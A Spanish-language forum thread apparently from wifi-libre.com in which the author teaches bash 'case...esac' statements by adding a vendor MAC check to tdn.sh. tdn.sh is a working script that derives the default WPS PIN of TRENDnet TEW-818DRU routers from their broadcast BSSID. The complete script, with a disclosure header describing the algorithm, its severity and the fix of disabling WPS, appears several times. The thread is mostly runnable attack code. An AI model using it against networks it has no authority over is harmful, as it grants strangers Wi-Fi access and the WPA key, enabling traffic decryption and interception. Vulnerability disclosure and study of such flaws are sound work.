El libre pensamiento para un internet libre
No estas registrado.
- Temas: Activo | Sin respuesta
#1 01-07-2015 17:23:29
- kcdtv
- Administrator
- Registrado: 14-11-2014
- Mensajes: 5,730
[Bash] Crear una estructura de control con una sentencia "case - esac"
El eminente lord d1k0w0ns sugiere una aportación al código bash "tdn.sh" ( tdn.sh: Generador PIN paraTRENDnet TEW-818DRU v1(ac1900) y v2(ac3200)).
Recuerdo rápido lo que hace tdn.sh. : El script pregunta al usuario de entrar el bssid de la red wifi 2.4 Ghz y devuelve en pantalla el PIN aplicando el algoritmo.
Si hacemos abstracción de las funciones dedicadas a generar el PIN es de lo más sencillo
La idea de sir d1k0w0ns es de añadir al script una "condición de control" que advierte el usuario de que la mac no pertenece a trendnet.
¡Al ataque!
Primero hay que encontrar la parte que queremos modificar.
depuramos el script quitando los créditos y nos queda esto:
############################################## SCRIPT (read comments for explanation about algorithm #######
NOcolor="\033[0;37m" # colors are set as variable
red="\033[1;31m"
purpple="\033[0;35m"
yellow="\033[1;33m"
white="\033[1;37m"
victorycolor="\033[1;43m"
ALGORITHM(){
###############################
# The algorithm can be divided in three steps. The two first steps are done in this function and the third one is done by the other function called "CEHCKSUM()"
# 1) The first step in the algorithm consist in changing the order of the last three bytes of the 2.4 Ghz (b/g/n) bssid to get a string ( defined hin this code as the variable "$SCRAMBLEDNIC". )
# example : if the 2.4 Ghz bSSID is 00:90:4C:10:E4:D2 the string created would be D2E410 (value for $SCRAMBLEDNIC)
SCRAMBELDNIC=$(printf `echo $BSSID | awk -F':' '{ print $6 }'``echo $BSSID | awk -F':' '{ print $5 }'``echo $BSSID | awk -F':' '{ print $4 }'`) # with awk using ":" as a separtor we grab the last bytes of the mac inverting the order
# 2) Once this string is defined it has to be converted from hexadecimal to decimal. In the code the result is saved in the variable #"$CONVERTEDMAC". Some zero padding and reduction with module in base 10 are performed to get a 7 digit number saved in the variable $STRING
CONVERTEDMAC=$(printf '%d\n' 0x$SCRAMBELDNIC) # conversion from hexadecimal to decimal
STRING=`expr '(' $CONVERTEDMAC '%' 10000000 ')'` # suppression of the first digit if the string is longer than 7 digits
# The PIN is generated, we just have to add the WPS checksum to create a full valid WPS PIN with the function "CHECKSUM")
}
CHECKSUM(){ # The function checksum was written by antares_145 from crack-wifi.com
PIN=`expr 10 '*' $STRING` # And generate the 8th digit of a WPS PIN
ACCUM=0 #
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'` # To generate it we multiply the first digit of the PIN by 3
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'` # The second digit by one
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'` # The third digit by three
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'` # etc...
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'` # ... we are done and all the results are sumed up in $ACCUM
DIGIT=`expr $ACCUM '%' 10` # we define our digit control: the sum reduced with base 10 to the unit number
CHECKSUM=`expr '(' 10 '-' $DIGIT ')' '%' 10` # the checksum is equal to " 10 minus digit control "
PIN=$(printf '%08d\n' `expr $PIN '+' $CHECKSUM`) # Some zero-padding in case that the value of the PIN is under 10000000
}
######################################################POC START HERE######################################################
echo -e "
$yellow .----------------. .----------------. .-----------------.
$yellow| .--------------. || .--------------. || .--------------. |
$yellow| |$red _________ $yellow | || |$red ________ $yellow | || |$red ____ _____$yellow | |
| |$red | _ _ |$yellow | || |$red |_ ___ .$yellow | || |$red|_ \|_ _|$yellow | |
| |$red |_/ | | \_|$yellow | || |$red | | . \ $yellow| || |$red | \ | |$yellow | |
| |$red | | $yellow | || |$red | | | | $yellow| || |$red | |\ \| |$yellow | |
| |$red _| |_ $yellow | || |$red _| |___.' / $yellow| || |$red _| |_\ |_ $yellow | |
| |$red |_____| $yellow | || |$red |________.' $yellow| || |$red|_____|\____|$yellow | |
| | | || | | || | | |
| '--------------' || '--------------' || '--------------' |$white.sh$yellow
'----------------' '----------------' '----------------'
$purpple DEFAULT PIN GENERATOR FOR$yellow TRENDNET$red TEW-818DRU$white VERSION.1$NOcolor ($red ac1900 $NOcolor)
$purpple AND$yellow TRENDNET$red TEW-818DRU$white VERSION.2$NOcolor ($red ac3200 $NOcolor)
GPL.3 code by$yellow kcdtv$NOcolor for
$red www.wifi-libre.com $yellow www.crack-wifi.com$NOcolor"
echo -e "$NOcolor"
echo -e " -------------------------------------"
echo -e "Insert the bSSID of the$white 2.4$NOcolor GHz wifi network:$yellow"
read -n 17 -ep " " BSSID # bssid is introduced as a variable
echo -e "$NOcolor"
while !(echo $BSSID | tr a-f A-F | egrep -q "^([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}$")
do # filter for checking the conformity bssid with loop over condition thanks to antares ;)
echo -e " $red Error :$white MAC No Conforme $NOcolor"
echo -e "$yellow*$NOcolor You must enter the full 2.4 ghz bSSID in hexadecimal format
(ex:$red 00:90:4C:10:E4:D2$NOcolor )"
echo -e "Insert the bSSID of the$white 2.4$NOcolor GHz wifi network:$yellow"
read -n 17 -ep " " BSSID
echo -e "$NOcolor"
done
OUICHECK=$(printf `echo $BSSID | awk -F':' '{ print $1 }'``echo $BSSID | awk -F':' '{ print $2 }'``echo $BSSID | awk -F':' '{ print $3 }'`)
if [[ $OUICHECK != 0014D1 ]] || [[ $OUICHECK != 0014D1 ]] ;
then
echo -e "$red warning$NOcolor : This mac adress does not belong to$white TRENDnet$NOcolor"
fi
ALGORITHM # function that scramble the NIC part of the bssid and convert it from decimal to hexadecimal
CHECKSUM # function that generate the correct wpschecksum and gives the full default WPS PIN for Tew-818DRU
echo -e "
$white The default$red PIN$white for 5ghz and 2,4ghz network is $victorycolor$PIN$NOcolor
$NOcolor for support visit$yellow www.wifi-libre.com$NOcolor
"
exit 0 En un script las funciones se suelen poner en inicio
Porque no se pueden poner después haber sido invocadas en el coligó: si no están definidas antes de ser ejecutadas no existen y no se hace nada
Vemos que en inicio del script ya depurado de los créditos tenemos dos funciones :
1. ALGORITHM (el algoritmo, no nos interesa para la mod así que lo quitamos)
fuera :
ALGORITHM(){
###############################
# The algorithm can be divided in three steps. The two first steps are done in this function and the third one is done by the other function called "CEHCKSUM()"
# 1) The first step in the algorithm consist in changing the order of the last three bytes of the 2.4 Ghz (b/g/n) bssid to get a string ( defined hin this code as the variable "$SCRAMBLEDNIC". )
# example : if the 2.4 Ghz bSSID is 00:90:4C:10:E4:D2 the string created would be D2E410 (value for $SCRAMBLEDNIC)
SCRAMBELDNIC=$(printf `echo $BSSID | awk -F':' '{ print $6 }'``echo $BSSID | awk -F':' '{ print $5 }'``echo $BSSID | awk -F':' '{ print $4 }'`) # with awk using ":" as a separtor we grab the last bytes of the mac inverting the order
# 2) Once this string is defined it has to be converted from hexadecimal to decimal. In the code the result is saved in the variable #"$CONVERTEDMAC". Some zero padding and reduction with module in base 10 are performed to get a 7 digit number saved in the variable $STRING
CONVERTEDMAC=$(printf '%d\n' 0x$SCRAMBELDNIC) # conversion from hexadecimal to decimal
STRING=`expr '(' $CONVERTEDMAC '%' 10000000 ')'` # suppression of the first digit if the string is longer than 7 digits
# The PIN is generated, we just have to add the WPS checksum to create a full valid WPS PIN with the function "CHECKSUM")
}2. CHECKSUM : para calcular el checksum WPS y esto tampoco nos importa ahora, fuera :
CHECKSUM(){ # The function checksum was written by antares_145 from crack-wifi.com
PIN=`expr 10 '*' $STRING` # And generate the 8th digit of a WPS PIN
ACCUM=0 #
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'` # To generate it we multiply the first digit of the PIN by 3
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'` # The second digit by one
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'` # The third digit by three
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'` # etc...
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'` # ... we are done and all the results are sumed up in $ACCUM
DIGIT=`expr $ACCUM '%' 10` # we define our digit control: the sum reduced with base 10 to the unit number
CHECKSUM=`expr '(' 10 '-' $DIGIT ')' '%' 10` # the checksum is equal to " 10 minus digit control "
PIN=$(printf '%08d\n' `expr $PIN '+' $CHECKSUM`) # Some zero-padding in case that the value of the PIN is under 10000000
} Luego empieza el script y lo primero que viene es la pantalla de bienvenida, fuera también :
######################################################POC START HERE######################################################
echo -e "
$yellow .----------------. .----------------. .-----------------.
$yellow| .--------------. || .--------------. || .--------------. |
$yellow| |$red _________ $yellow | || |$red ________ $yellow | || |$red ____ _____$yellow | |
| |$red | _ _ |$yellow | || |$red |_ ___ .$yellow | || |$red|_ \|_ _|$yellow | |
| |$red |_/ | | \_|$yellow | || |$red | | . \ $yellow| || |$red | \ | |$yellow | |
| |$red | | $yellow | || |$red | | | | $yellow| || |$red | |\ \| |$yellow | |
| |$red _| |_ $yellow | || |$red _| |___.' / $yellow| || |$red _| |_\ |_ $yellow | |
| |$red |_____| $yellow | || |$red |________.' $yellow| || |$red|_____|\____|$yellow | |
| | | || | | || | | |
| '--------------' || '--------------' || '--------------' |$white.sh$yellow
'----------------' '----------------' '----------------'
$purpple DEFAULT PIN GENERATOR FOR$yellow TRENDNET$red TEW-818DRU$white VERSION.1$NOcolor ($red ac1900 $NOcolor)
$purpple AND$yellow TRENDNET$red TEW-818DRU$white VERSION.2$NOcolor ($red ac3200 $NOcolor)
GPL.3 code by$yellow kcdtv$NOcolor for
$red www.wifi-libre.com $yellow www.crack-wifi.com$NOcolor"
echo -e "$NOcolor"Y nos quedan estas lineas que son el script :
he dividido los pasos, nosotros lo que vamos a hacer ahora es añadir un trozo de código entre el paso 2 y 3.
Es decir : una vez que tenemos el bssid introducido (1) y que hemos comprobado la validez de su longitud y de su formato (2); añadiremos una segunda comprobación - esta vez sobre el inicio del bssid - para saber si la mac corresponde o no a una atribuida abiertamente a TRENDnet.
Y luego generaremos el PIN: lo que era el paso 3 será entonces un paso 4.
Para que sea fácil voy a usar sintaxis muy simples y usar un derivado de búcle for que simplifica la vida : case in.
definir las variables
como vemos en el código la variable que vamos a usar es BSSID :
echo -e "Insert the bSSID of the$white 2.4$NOcolor GHz wifi network:$yellow"
read -n 17 -ep " " BSSID # bssid is introduced as a variableEs el bssid entero.
poner en consola y dar le a enter
read -n 17 -ep " pon el bssid aquí: " BSSID y luego hacéis
echo $BSSIDy aparece el bssid entero tal cual lo habéis entrado
para no ir a lo loko depurando al vuelo para hacer todo en una linea vamos a ir paso a paso con ordenes simples.
Lo primero es definir una nueva variable papra efectuar luego la comproabción, una variable que contenga la primera mitad del bSSID
Para recortar texto con bash podemos usar el comando cut (ver curso bash para detalles)
en la misma consola entrar ahora
echo $BSSID | cut -c -9y obtenemos la primera parte del BSSID:
sobre la linea de codigo empleada :
el pipe (|) permite concadenar dos ordenes. Lo que se produce a la izquierda del pipe se manda como entrada a lo que esta a la derecha : El resultado de "echo $BSSID" será así procesado por la orden cut
las orden cut esta empleada con el argumento -c (caracteres) que cuenta los caracteres.
He definido el corte con -9. Con El guion puesto antes del 9 para que se interpreta como "recortar hasta el noveno carácter. Si redacteís la "orden cut asi" : -cut -c 9- ; vais a obtener el final del BSSID por haber puesto el guión después el 9
¿OK?
Pues vamos a definir una variable nueva, que lamamos "OUI", y que guardara el inicio de BSSID (hasta el carácter numero 8, para tener algo así XX:XX:XX )
OUI=$( echo $BSSID | cut -c -8 )ahora la función de comprobación.
Estructuras de control con "case"
Si me recuerdo bien "case" es en esencia una construcción a base del búcle for.
No importa mucho, lo que interesa es a que sirve :
case: Ejecuta una o varias listas de comandos dependiendo del valor de una variable.
Bash (IV) - Estructuras de control y bucles
Y es lo que queremos hacer : condicionar el curso del script según nuestro incio de bssid que tenemos guardado a la variable $OUI
la forma básica de una sentencia case esac es:
case expresion in
caso_1 )
comandos;;
caso_2 )
comandos;;
......
esac
Empezamos con case <nuestra variable> in para definir la variable que se usará para la comprobación,
Lo que nos da
case $OUI inLuego definimos nuestro primero caso. Aquí vamos a elegir uno de los dos inicios de bSSID conocidos para TRENDnet. Uno de ellos es D8:EB:97
case $OUI in
D8:EB:97 )Y luego la orden a ejecutar si el valor de $OUI es el definido ( D8:EB:97 que pertenece seguramente a trendnet ). En este caso solo vamos a decir en consola con echo que la mac es buena. Notar los ;; que es una instrucción de cierre para decir que ya hemos acabado de redactar ordenes para el primero caso.
case $OUI in
D8:EB:97 )
echo " OUI Check : The mac adress belongs to Trendnet"
;;Y podemos añadir todos los casos que queramos. Cuando acabamos de poner los casos debemos cerrar la sentencia case con la ordén de cierre.
a titulo de ejemplo :
case $OUI in
D8:EB:97 )
echo " OUI-Check : The mac adress belongs to Trendnet"
;;
esacBien podemos añadir un millón de condiciones para cubrir todos los inicio de bsid posibles o simplificar.
Primero conocemos a dos inicios de mac para TRENDnet.
En lugar de añadir otro caso para decir lo mismo (la mac es correcta) para el otro inicio de mac; podemos incluir el segunda valor en nuestro primero caso.
se hace con el símbolo "|" (el "pipe" que signifca también "y" en este contexto )
Así nuestra sentencia "case esac" abarca los dos valores en un solo caso :
case $OUI in
D8:EB:97 | 00:14:D1 )
echo " OUI-Check : The mac adress belongs to Trendnet"
;;
esacY para cubrir todos los otros casos (mac que no es de trendnet) usaremos una pequeña estrella *. Que signifca pues... todo lo demás 
con un mensaje de error esta vez...
case $OUI in
D8:EB:97 | 00:14:D1 )
echo " OUI-Check : The mac adress belongs to Trendnet"
;;
* )
echo "ERROR : OUI-Check Failed! The mac adress of the device does not belong to TRENDnet!"
;;
esac¡Ya esta!
solo hay que intercalar este código entre 2 y 3... pongo algo de colores y salto unas liñas para el estilo 
aquí tienes el código entero modificado
########################################################################################################
# Title of the breach : Full disclosure of default PIN algorithm with PoC (tdn.sh) for TRENDnet TEW-818RDU v.1 ("ac1900") and v.2 ("ac3200")
# Credits : kcdtv
# Originaly disclosed the 29th june 2014 for the first version of TEW-818RDU (ac1900) in www.crack-wifi.com
# Link : http://www.crack-wifi.com/forum/topic-10657-trendnet-tew-818dru-ac19000-full-disclosure-wps-pin.html
# Fully disclosed the 25th of june 2015 for version 1 and 2 (ac3200) with PoC bash code (tdn.sh) in www.wifi-libre.com
# Link : https://www.wifi-libre.com/topic-160-algoritmo-pin-para-tew-818rdu-v1-ac1900-y-v2-ac3200-de-trendnet.html
################################################### AFFECTED DEVICE ##########################################################
# TEW-818DRU version 1 (ac1900) : A dual-band access point manufactured by TRENDnet - you can check the administration interface here : http://www.trendnet.com/emulators/TEW-818DRU_v1/login.htm
# TEW-818DRU version 2 (ac3200) : The last revision of this router, the fastest router manufactured by TRENDnet with trial-band - you can check the administration interface here : http://www.trendnet.com/emulators/TEW-818DRU_v1/login.htm
################################################### DESCRIPTION OF THE BREACH #################################################
### DANEGEROUS WPS SETTINGS
# The two versions use the same kind of (bad) WPS settings
# * The WPS in PIN mode is activated by default
# * It has a PIN enabled that is not configurable. A static PIN.
# * This non configurable PIN is also unique : it is used by all the networks (2.4 and 5 Ghz bands)
# It is already a bad configuration whith the possibility tu brute force the hahses from the M3 ("pixiedust" attack) or tu perform a classical brute force of the PIN itself with reaver or bully
#### BSSID BASED ALGORITHM REVERSED
# It is the second half of the 2.4 Ghz bSSID (NIC) that is used to generate this unique, non-configurable and activated PIN
# The bSSID is broadcasted and can be gathered with a simple wireless scan
# Instead of using - as it has been done with many other devices including some older trendnet devices - a straightforward hexadecimal to decimal conversion of this portion of the bssid to generate the PIN; The trendnet crew "updated" the concept by inverting the first and the last byte of the string before conversion. My english is "so-so" so let's take a very simple example to illustrate it
### STEP 1
# Grab the the bSSID of the 2.4 ghz network, as an example we will take 00:00:00:11:22:33
### STEP 2
# Grab the second half (NIC portion) of this bSSID. That would be 11:22:33 in our example
### STEP 3
# Invert the last and first byte of this string. It gives us 33:22:11
### STEP 4
# Convert from hexadecimal to decimal. It gives us 3351057
### STEP 5
# Generate the WPS checksum to get the full PIN. If the string obtained previously is superior to 9999999 you will have to take away the superior unity to get a 7 digit length string. If the string value is inferior to 1000000 you will have to perform some zero-padding until you get a 7 digit long string. In our example we get the PIN 33510576.
#See the annotated script tdn.sh for more details.
################################################## SEVERITY ##################################################################
# A person within the wifi area of the router can get access to both 5Ghz and 2.4Ghz networks immediately by sending the correct PIN. He will also have the WPA key that could be used in order to perform much more intrusive actions (decrypt traffic, MITM...)
################################################# SOLUTION ##################################################################
# Risks are very high but it is by chance very simple to secure the WiFi network by disabling the WPS in the configuration interface
# As a recommendation for your safety: - do not use the WPS and be sure that it is absolutely disabled in every mode
# - you should install DD-WRT in this devices instead of the original firmware
################################################### TIMELINE ##################################################################
# 16-06-2014 : I noticed the weak algorithm by visiting trendnet emulator for this device (see link in "AFFECTED DEVICE")
# 17-06-2014 : I wrote to Trendnet to ask them if the data in the web interface are correct and if the algorithm I found is the one really used
# 29-06-2014 : No answer from trendnet so i published my study in crack-wifi.com http://www.crack-wifi.com/forum/topic-10657-trendnet-tew-818dru-ac19000-full-disclosure-wps-pin.html
# february 2015 : I found on the web some datas and they confirmed the use of this algorithm : https://www.youtube.com/watch?v=HyfIX1B8cx0
# 25-06-2015 : One year after and with the newest version affected I decide to fully disclose the breach with a PoC script, tdn.sh : https://www.wifi-libre.com/topic-160-algoritmo-pin-para-tew-818rdu-v1-ac1900-y-v2-ac3200-de-trendnet.html
############################################### CREDITS ###############################################################
# kcdtv
############################################### WEBSITE(s)#############################################################
# www.wifi-libre.com
# www.crack-wifi.com
############################################ HOW TO USE THIS POC ############################################
# Save this text in a blank document that you can call tdn.sh
# locate a terminal in the folder where you saved the script (cd or right clik + open terminal here )
# Launch the script form the shell with :
# bash tdn.sh
# Enter the full bSSID of the 2.4 Ghz network in hexadecimal format (ex : 00:90:4C:0F:F4:D2 ) and press enter
############################################## SCRIPT (read comments for explanation about algorithm #######
#!/bin/bash
#################################################### LEGAL ADVISORY ####################################################################
# tdn.sh copyleft 25th June 2015 :
# This scripts is edited under the General Public License version 3 from the Free software foundation.
# This package is distributed in the hope that it will be useful, but without any warranty; It can be used and modified and shared but should be referenced to according to GPL v3 terms
# It CANNOT be sold or used for a commercial-economical purpose.
# See for more details about GPL v3 : http://gplv3.fsf.org/
NOcolor="\033[0;37m" # colors are set as variable
red="\033[1;31m"
purpple="\033[0;35m"
yellow="\033[1;33m"
white="\033[1;37m"
victorycolor="\033[1;43m"
ALGORITHM(){
###############################
# The algorithm can be divided in three steps. The two first steps are done in this function and the third one is done by the other function called "CEHCKSUM()"
# 1) The first step in the algorithm consist in changing the order of the last three bytes of the 2.4 Ghz (b/g/n) bssid to get a string ( defined hin this code as the variable "$SCRAMBLEDNIC". )
# example : if the 2.4 Ghz bSSID is 00:90:4C:10:E4:D2 the string created would be D2E410 (value for $SCRAMBLEDNIC)
SCRAMBELDNIC=$(printf `echo $BSSID | awk -F':' '{ print $6 }'``echo $BSSID | awk -F':' '{ print $5 }'``echo $BSSID | awk -F':' '{ print $4 }'`) # with awk using ":" as a separtor we grab the last bytes of the mac inverting the order
# 2) Once this string is defined it has to be converted from hexadecimal to decimal. In the code the result is saved in the variable #"$CONVERTEDMAC". Some zero padding and reduction with module in base 10 are performed to get a 7 digit number saved in the variable $STRING
CONVERTEDMAC=$(printf '%d\n' 0x$SCRAMBELDNIC) # conversion from hexadecimal to decimal
STRING=`expr '(' $CONVERTEDMAC '%' 10000000 ')'` # suppression of the first digit if the string is longer than 7 digits
# The PIN is generated, we just have to add the WPS checksum to create a full valid WPS PIN with the function "CHECKSUM")
}
CHECKSUM(){ # The function checksum was written by antares_145 from crack-wifi.com
PIN=`expr 10 '*' $STRING` # And generate the 8th digit of a WPS PIN
ACCUM=0 #
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'` # To generate it we multiply the first digit of the PIN by 3
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'` # The second digit by one
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'` # The third digit by three
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'` # etc...
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'` # ... we are done and all the results are sumed up in $ACCUM
DIGIT=`expr $ACCUM '%' 10` # we define our digit control: the sum reduced with base 10 to the unit number
CHECKSUM=`expr '(' 10 '-' $DIGIT ')' '%' 10` # the checksum is equal to " 10 minus digit control "
PIN=$(printf '%08d\n' `expr $PIN '+' $CHECKSUM`) # Some zero-padding in case that the value of the PIN is under 10000000
}
######################################################POC START HERE######################################################
echo -e "
$yellow .----------------. .----------------. .-----------------.
$yellow| .--------------. || .--------------. || .--------------. |
$yellow| |$red _________ $yellow | || |$red ________ $yellow | || |$red ____ _____$yellow | |
| |$red | _ _ |$yellow | || |$red |_ ___ .$yellow | || |$red|_ \|_ _|$yellow | |
| |$red |_/ | | \_|$yellow | || |$red | | . \ $yellow| || |$red | \ | |$yellow | |
| |$red | | $yellow | || |$red | | | | $yellow| || |$red | |\ \| |$yellow | |
| |$red _| |_ $yellow | || |$red _| |___.' / $yellow| || |$red _| |_\ |_ $yellow | |
| |$red |_____| $yellow | || |$red |________.' $yellow| || |$red|_____|\____|$yellow | |
| | | || | | || | | |
| '--------------' || '--------------' || '--------------' |$white.sh$yellow
'----------------' '----------------' '----------------'
$purpple DEFAULT PIN GENERATOR FOR$yellow TRENDNET$red TEW-818DRU$white VERSION.1$NOcolor ($red ac1900 $NOcolor)
$purpple AND$yellow TRENDNET$red TEW-818DRU$white VERSION.2$NOcolor ($red ac3200 $NOcolor)
GPL.3 code by$yellow kcdtv$NOcolor for
$red www.wifi-libre.com $yellow www.crack-wifi.com$NOcolor"
echo -e "$NOcolor"
echo -e " -------------------------------------"
echo -e "Insert the bSSID of the$white 2.4$NOcolor GHz wifi network:$yellow"
read -n 17 -ep " " BSSID # bssid is introduced as a variable
echo -e "$NOcolor"
while !(echo $BSSID | tr a-f A-F | egrep -q "^([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}$")
do # filter for checking the conformity bssid with loop over condition thanks to antares ;)
echo -e " $red Error :$white MAC No Conforme $NOcolor"
echo -e "$yellow*$NOcolor You must enter the full 2.4 ghz bSSID in hexadecimal format
(ex:$red 00:90:4C:10:E4:D2$NOcolor )"
echo -e "Insert the bSSID of the$white 2.4$NOcolor GHz wifi network:$yellow"
read -n 17 -ep " " BSSID
echo -e "$NOcolor"
done
######### update july the 1st pf 2015 for dk10v and the " awireless "X" project " :D #####################################################
# This part of the code shake if the mac adress belongs or not to trendnet
OUI=$( echo $BSSID | cut -c -8 ) # We grab the first half of the BSSID and store the value in $OUI
case $OUI in
D8:EB:97 | 00:14:D1 )
echo -e " $purpple OUI-CHECK :$white The mac adress belongs to TRENDnet"
;;
* )
echo -e " $red OUI-CHECK FAILED! $white The mac adress does not belong to TRENDnet"
;;
esac
ALGORITHM # function that scramble the NIC part of the bssid and convert it from decimal to hexadecimal
CHECKSUM # function that generate the correct wpschecksum and gives the full default WPS PIN for Tew-818DRU, credits to antares_145
echo -e "
$white The default$red PIN$white for 5ghz and 2,4ghz network is $victorycolor$PIN$NOcolor
$NOcolor for support visit$yellow www.wifi-libre.com$NOcolor
"
exit 0 
Desconectado
#2 02-07-2015 02:40:20
- d1k0w0ns
- Expulsado
- Registrado: 12-06-2015
- Mensajes: 374
Re: [Bash] Crear una estructura de control con una sentencia "case - esac"
esta era la idea tambien una linea informando de las macs
no se si seria mejor poner "macs trendnet" o "macs vulnerables"
dejo aqui el codigo con las macs vulnerables visibles y el añadido del color verde fosforito en la seccion colores
3 lineas de nada añadidas
############
############################################################################################
# Title of the breach : Full disclosure of default PIN algorithm with PoC (tdn.sh) for TRENDnet TEW-818RDU v.1 ("ac1900") and v.2 ("ac3200")
# Credits : kcdtv
# Originaly disclosed the 29th june 2014 for the first version of TEW-818RDU (ac1900) in www.crack-wifi.com
# Link : http://www.crack-wifi.com/forum/topic-10657-trendnet-tew-818dru-ac19000-full-disclosure-wps-pin.html
# Fully disclosed the 25th of june 2015 for version 1 and 2 (ac3200) with PoC bash code (tdn.sh) in www.wifi-libre.com
# Link : https://www.wifi-libre.com/topic-160-algoritmo-pin-para-tew-818rdu-v1-ac1900-y-v2-ac3200-de-trendnet.html
################################################### AFFECTED DEVICE ##########################################################
# TEW-818DRU version 1 (ac1900) : A dual-band access point manufactured by TRENDnet - you can check the administration interface here : http://www.trendnet.com/emulators/TEW-818DRU_v1/login.htm
# TEW-818DRU version 2 (ac3200) : The last revision of this router, the fastest router manufactured by TRENDnet with trial-band - you can check the administration interface here : http://www.trendnet.com/emulators/TEW-818DRU_v1/login.htm
################################################### DESCRIPTION OF THE BREACH #################################################
### DANEGEROUS WPS SETTINGS
# The two versions use the same kind of (bad) WPS settings
# * The WPS in PIN mode is activated by default
# * It has a PIN enabled that is not configurable. A static PIN.
# * This non configurable PIN is also unique : it is used by all the networks (2.4 and 5 Ghz bands)
# It is already a bad configuration whith the possibility tu brute force the hahses from the M3 ("pixiedust" attack) or tu perform a classical brute force of the PIN itself with reaver or bully
#### BSSID BASED ALGORITHM REVERSED
# It is the second half of the 2.4 Ghz bSSID (NIC) that is used to generate this unique, non-configurable and activated PIN
# The bSSID is broadcasted and can be gathered with a simple wireless scan
# Instead of using - as it has been done with many other devices including some older trendnet devices - a straightforward hexadecimal to decimal conversion of this portion of the bssid to generate the PIN; The trendnet crew "updated" the concept by inverting the first and the last byte of the string before conversion. My english is "so-so" so let's take a very simple example to illustrate it
### STEP 1
# Grab the the bSSID of the 2.4 ghz network, as an example we will take 00:00:00:11:22:33
### STEP 2
# Grab the second half (NIC portion) of this bSSID. That would be 11:22:33 in our example
### STEP 3
# Invert the last and first byte of this string. It gives us 33:22:11
### STEP 4
# Convert from hexadecimal to decimal. It gives us 3351057
### STEP 5
# Generate the WPS checksum to get the full PIN. If the string obtained previously is superior to 9999999 you will have to take away the superior unity to get a 7 digit length string. If the string value is inferior to 1000000 you will have to perform some zero-padding until you get a 7 digit long string. In our example we get the PIN 33510576.
#See the annotated script tdn.sh for more details.
################################################## SEVERITY ##################################################################
# A person within the wifi area of the router can get access to both 5Ghz and 2.4Ghz networks immediately by sending the correct PIN. He will also have the WPA key that could be used in order to perform much more intrusive actions (decrypt traffic, MITM...)
################################################# SOLUTION ##################################################################
# Risks are very high but it is by chance very simple to secure the WiFi network by disabling the WPS in the configuration interface
# As a recommendation for your safety: - do not use the WPS and be sure that it is absolutely disabled in every mode
# - you should install DD-WRT in this devices instead of the original firmware
################################################### TIMELINE ##################################################################
# 16-06-2014 : I noticed the weak algorithm by visiting trendnet emulator for this device (see link in "AFFECTED DEVICE")
# 17-06-2014 : I wrote to Trendnet to ask them if the data in the web interface are correct and if the algorithm I found is the one really used
# 29-06-2014 : No answer from trendnet so i published my study in crack-wifi.com http://www.crack-wifi.com/forum/topic-10657-trendnet-tew-818dru-ac19000-full-disclosure-wps-pin.html
# february 2015 : I found on the web some datas and they confirmed the use of this algorithm : https://www.youtube.com/watch?v=HyfIX1B8cx0
# 25-06-2015 : One year after and with the newest version affected I decide to fully disclose the breach with a PoC script, tdn.sh : https://www.wifi-libre.com/topic-160-algoritmo-pin-para-tew-818rdu-v1-ac1900-y-v2-ac3200-de-trendnet.html
############################################### CREDITS ###############################################################
# kcdtv
############################################### WEBSITE(s)#############################################################
# www.wifi-libre.com
# www.crack-wifi.com
############################################ HOW TO USE THIS POC ############################################
# Save this text in a blank document that you can call tdn.sh
# locate a terminal in the folder where you saved the script (cd or right clik + open terminal here )
# Launch the script form the shell with :
# bash tdn.sh
# Enter the full bSSID of the 2.4 Ghz network in hexadecimal format (ex : 00:90:4C:0F:F4:D2 ) and press enter
############################################## SCRIPT (read comments for explanation about algorithm #######
#!/bin/bash
#################################################### LEGAL ADVISORY ####################################################################
# tdn.sh copyleft 25th June 2015 :
# This scripts is edited under the General Public License version 3 from the Free software foundation.
# This package is distributed in the hope that it will be useful, but without any warranty; It can be used and modified and shared but should be referenced to according to GPL v3 terms
# It CANNOT be sold or used for a commercial-economical purpose.
# See for more details about GPL v3 : http://gplv3.fsf.org/
NOcolor="\033[0;37m" # colors are set as variable
red="\033[1;31m"
purpple="\033[0;35m"
yellow="\033[1;33m"
white="\033[1;37m"
victorycolor="\033[1;43m"
green="\033[01;32m"
ALGORITHM(){
###############################
# The algorithm can be divided in three steps. The two first steps are done in this function and the third one is done by the other function called "CEHCKSUM()"
